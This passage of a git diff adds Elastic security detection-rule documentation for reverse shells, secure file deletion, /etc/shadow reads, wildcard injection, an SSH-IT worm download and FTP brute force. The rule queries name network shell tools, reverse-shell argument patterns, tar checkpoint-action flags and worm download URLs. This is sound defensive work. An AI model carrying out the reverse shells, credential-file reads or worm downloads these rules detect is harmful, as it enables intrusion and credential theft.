({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=5s + [network where host.os.type == "linux" and event.action in ("connection_accepted", "connection_attempted") and + process.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" + ] by process.entity_id + [process where host.os.type == "linux" and event.action == "exec" and + process.parent.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and + process.parent.args : "-jar" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") + ] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary.asciidoc new file mode 100644 index 0000000000..6eb92b7196 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary.asciidoc @@ -0,0 +1,90 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary]] +=== Potential Reverse Shell via Suspicious Binary + +This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary (located in a commonly abused location or executed manually) followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour. Attackers may spawn reverse shells to establish persistence onto a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s +[ process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and + process.executable : ( + "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*", + "/etc/crontab", "/etc/cron.*", "/etc/update-motd.d/*", "/usr/lib/update-notifier/*", + "/boot/*", "/srv/*", "/run/*", "/root/*", "/etc/rc.local" + ) and + process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and not + process.name : ("curl", "wget", "ping", "apt", "dpkg", "yum", "rpm", "dnf", "dockerd") ] +[ network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.executable : ( + "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*", + "/etc/crontab", "/etc/cron.*", "/etc/update-motd.d/*", "/usr/lib/update-notifier/*", + "/boot/*", "/srv/*", "/run/*", "/root/*", "/etc/rc.local" + ) and destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] +[ process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process.asciidoc new file mode 100644 index 0000000000..73d6629a5c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process.asciidoc @@ -0,0 +1,97 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process]] +=== Potential Reverse Shell via Suspicious Child Process + +This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by the specified utilities that are initialized from a single process followed by a network connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "fork") and ( + (process.name : "python*" and process.args : "-c" and process.args : ( + "*import*pty*spawn*", "*import*subprocess*call*" + )) or + (process.name : "perl*" and process.args : "-e" and process.args : "*socket*" and process.args : ( + "*exec*", "*system*" + )) or + (process.name : "ruby*" and process.args : ("-e", "-rsocket") and process.args : ( + "*TCPSocket.new*", "*TCPSocket.open*" + )) or + (process.name : "lua*" and process.args : "-e" and process.args : "*socket.tcp*" and process.args : ( + "*io.popen*", "*os.execute*" + )) or + (process.name : "php*" and process.args : "-r" and process.args : "*fsockopen*" and process.args : "*/bin/*sh*") or + (process.name : ("awk", "gawk", "mawk", "nawk") and process.args : "*/inet/tcp/*") or + (process.name : "openssl" and process.args : "-connect") or + (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3 and not process.args == "-z") or + (process.name : "telnet" and process.args_count >= 3) + ) and process.parent.name : ( + "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "python*", "php*", "perl", "ruby", "lua*", + "openssl", "nc", "netcat", "ncat", "telnet", "awk")] + [network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") and + destination.ip != null and not cidrmatch(destination.ip, "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4", "::1")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-udp.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-udp.asciidoc new file mode 100644 index 0000000000..e25d9252a3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-udp.asciidoc @@ -0,0 +1,86 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-via-udp]] +=== Potential Reverse Shell via UDP + +This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-auditd_manager.auditd-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sample by host.id, process.pid, process.parent.pid +[process where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + auditd.data.syscall == "execve" and process.name : ("bash", "dash", "sh", "tcsh", + "csh", "zsh", "ksh", "fish", "perl", "python*", "nc", "ncat", "netcat", "php*", "ruby", + "openssl", "awk", "telnet", "lua*", "socat")] +[process where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + auditd.data.syscall == "socket" and process.name : ("bash", "dash", "sh", "tcsh", "csh", + "zsh", "ksh", "fish", "perl", "python*", "nc", "ncat", "netcat", "php*", "ruby", "openssl", + "awk", "telnet", "lua*", "socat") and auditd.data.a0 == "2" and auditd.data.a1 : ("2", "802")] +[network where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + auditd.data.syscall == "connect" and process.name : ("bash", "dash", "sh", "tcsh", "csh", + "zsh", "ksh", "fish", "perl", "python*", "nc", "ncat", "netcat", "php*", "ruby", "openssl", + "awk", "telnet", "lua*", "socat") and network.direction == "egress" and destination.ip != null and + destination.ip != "127.0.0.1" and destination.ip != "127.0.0.53" and destination.ip != "::1"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell.asciidoc new file mode 100644 index 0000000000..c37a65a4ba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell.asciidoc @@ -0,0 +1,80 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell]] +=== Potential Reverse Shell + +This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1s + [network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1"] by process.entity_id + [process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "fork") and + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") and not + process.args : "*imunify360-agent*"] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility.asciidoc new file mode 100644 index 0000000000..8c1d79cee3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility]] +=== Potential Secure File Deletion via SDelete Utility + +Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Impact +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Secure File Deletion via SDelete Utility + +SDelete is a tool primarily used for securely deleting data from storage devices, making it unrecoverable. Microsoft develops it as part of the Sysinternals Suite. Although commonly used to delete data securely, attackers can abuse it to delete forensic indicators and remove files as a post-action to a destructive action such as ransomware or data theft to hinder recovery efforts. + +This rule identifies file name patterns generated by the use of SDelete utility to securely delete a file via multiple file overwrite and rename operations. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Examine the command line and identify the files deleted, their importance and whether they could be the target of antiforensics activity. + +### False positive analysis + +- This is a dual-use tool, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and there are justifications for the execution. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. + - Prioritize cases involving critical servers and users. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If important data was encrypted, deleted, or modified, activate your data recovery plan. + - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "change" and file.name : "*AAA.AAA" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: File Deletion +** ID: T1070.004 +** Reference URL: https://attack.mitre.org/techniques/T1070/004/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities.asciidoc new file mode 100644 index 0000000000..e9d215f030 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities.asciidoc @@ -0,0 +1,79 @@ +[[prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities]] +=== Potential Shadow File Read via Command Line Utilities + +Identifies access to the /etc/shadow file via the commandline using standard system utilities. After elevating privileges to root, threat actors may attempt to read or dump this file in order to gain valid credentials. They may utilize these to move laterally undetected and access additional resources. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type : "linux" and event.category : "process" and event.action : ("exec" or "exec_event") and +(process.args : "/etc/shadow" or (process.working_directory: "/etc" and process.args: "shadow")) and not +(process.executable : ("/bin/chown" or "/usr/bin/chown") and process.args : "root:shadow") and not +(process.executable : ("/bin/chmod" or "/usr/bin/chmod") and process.args : "640") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: /etc/passwd and /etc/shadow +** ID: T1003.008 +** Reference URL: https://attack.mitre.org/techniques/T1003/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected.asciidoc new file mode 100644 index 0000000000..fedd8da0f4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected.asciidoc @@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected]] +=== Potential Shell via Wildcard Injection Detected + +This rule monitors for the execution of a set of linux binaries, that are potentially vulnerable to wildcard injection, with suspicious command line flags followed by a shell spawn event. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.exploit-db.com/papers/33930 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and ( + (process.name == "tar" and process.args : "--checkpoint=*" and process.args : "--checkpoint-action=*") or + (process.name == "rsync" and process.args : "-e*") or + (process.name == "zip" and process.args == "--unzip-command") )] by process.entity_id + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.parent.name : ("tar", "rsync", "zip") and + process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded.asciidoc new file mode 100644 index 0000000000..66d84e60cc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded.asciidoc @@ -0,0 +1,78 @@ +[[prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded]] +=== Potential SSH-IT SSH Worm Downloaded + +Identifies processes that are capable of downloading files with command line arguments containing URLs to SSH-IT's autonomous SSH worm. This worm intercepts outgoing SSH connections every time a user uses ssh. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.thc.org/ssh-it/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend +* Data Source: Elastic Endgame + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name in ("curl", "wget") and process.args : ( + "https://thc.org/ssh-it/x", "http://nossl.segfault.net/ssh-it-deploy.sh", "https://gsocket.io/x", + "https://thc.org/ssh-it/bs", "http://nossl.segfault.net/bs" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ +* Technique: +** Name: Remote Service Session Hijacking +** ID: T1563 +** Reference URL: https://attack.mitre.org/techniques/T1563/ +* Sub-technique: +** Name: SSH Hijacking +** ID: T1563.001 +** Reference URL: https://attack.mitre.org/techniques/T1563/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected.asciidoc new file mode 100644 index 0000000000..17e989e88c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected.asciidoc @@ -0,0 +1,73 @@ +[[prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected]] +=== Potential Successful Linux FTP Brute Force Attack Detected + +An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-auditd_manager.auditd-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, auditd.data.addr, related.user with maxspan=5s + [authentication where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + event.action == "authenticated" and auditd.data.terminal == "ftp" and event.outcome == "failure" and + auditd.data.addr != null and auditd.data.addr != "0.0.0.0" and auditd.data.addr != "::"] with runs=10 + [authentication where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + event.action == "authenticated" and auditd.data.terminal == "ftp" and event.outcome == "success" and + auditd.data.addr != null and auditd.data.addr != "0.0.0.0" and auditd.data.addr != "::"] | tail 1 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected.asciidoc new file mode 100644 index 0000000000..43eeb88094 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected.asciidoc @@ -0,0 +1,71 @@ +[[prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected]] +=== Potential Successful Linux RDP Brute Force 